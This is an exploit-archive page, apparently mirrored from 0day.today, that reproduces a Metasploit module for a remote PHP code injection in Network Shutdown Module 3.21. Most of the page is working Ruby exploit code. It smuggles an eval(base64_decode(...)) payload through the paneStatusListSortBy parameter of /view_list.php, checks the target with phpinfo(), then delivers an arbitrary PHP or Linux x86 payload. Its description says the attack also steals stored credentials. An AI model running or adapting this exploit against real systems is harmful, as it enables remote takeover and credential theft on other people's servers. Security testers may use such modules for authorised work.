Network Shutdown Module 3.21 Remote PHP Code Injection

🗓️ 29 Nov 2012 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 16 Views

Network Shutdown Module 3.21 Remote PHP Code Injection. Vulnerability in lib/dbtools.inc allows unsanitized user input in eval() call. Base64 credentials extracted from database. Requires USV module in "nodes" table

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection',
      'Description'    => %q{
        This module exploits a vulnerability in lib/dbtools.inc which uses
        unsanitized user input inside a eval() call. Additionally the base64 encoded
        user credentials are extracted from the database of the application. Please
        note that in order to be able to steal credentials, the vulnerable service
        must have at least one USV module (an entry in the "nodes" table in mgedb.db)
      },
      'Author'         =>
        [
          'h0ng10',  # original discovery, msf module
          'sinn3r'   # PhpEXE shizzle
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '83199'],
          ['URL', 'http://secunia.com/advisories/49103/']
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 4000
        },
      'Platform'       => ['php', 'linux'],
      'Arch'           => ARCH_PHP,

      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
          [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'Jun 26 2012'
    ))

    register_options(
      [
        Opt::RPORT(4679)
      ], self.class)
  end

  def check
    # we use a call to phpinfo() for verification
    res = execute_php_code("phpinfo();die();")

    if not res or res.code != 200
      print_error("Failed: Error requesting page")
      return CheckCode::Unknown
    end

    return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
    return CheckCode::Safe
  end

  def execute_php_code(code, opts = {})
    param_name = rand_text_alpha(6)
    padding    = rand_text_alpha(6)
    url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

    res = send_request_cgi(
      {
        'uri'   =>  '/view_list.php',
        'method' => 'POST',
        'vars_get' =>
          {
            'paneStatusListSortBy' => url_param,
          },
        'vars_post' =>
          {
            param_name => Rex::Text.encode_base64(code),
          },
        'headers' =>
          {
            'Connection' => 'Close',
          }
      })
  end

  def no_php_tags(p)
    p = p.gsub(/^<\?php /, '')
    p.gsub(/ \?\>$/, '')
  end

  def exploit
    print_status("#{rhost}:#{rport} - Sending payload")

    unlink = (target['Platform'] == 'linux') ? true : false
    p      = no_php_tags(get_write_exec_payload(:unlink_self => unlink))

    execute_php_code(p)
    handler
  end
end

#  0day.today [2018-01-10]  #

29 Nov 2012 00:00Current

6.8Medium risk

Vulners AI Score6.8